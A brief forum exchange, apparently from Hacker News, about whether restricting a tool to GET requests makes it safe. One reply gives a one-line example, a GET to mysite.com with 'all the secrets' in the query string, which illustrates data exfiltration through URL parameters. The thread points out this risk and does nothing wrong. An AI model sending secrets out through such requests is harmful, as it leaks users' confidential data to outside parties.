▲ | ammario 3 days ago | |
I meant read-only there in the sense of mutability, not exfiltration. Of course, some websites may permit mutations through GET so it’s probably only sensible to use alongside known hosts. | ||
▲ | cmpaul 3 days ago | parent [-] | |
``` GET https://mysite.com/?query=all+the+secrets ``` |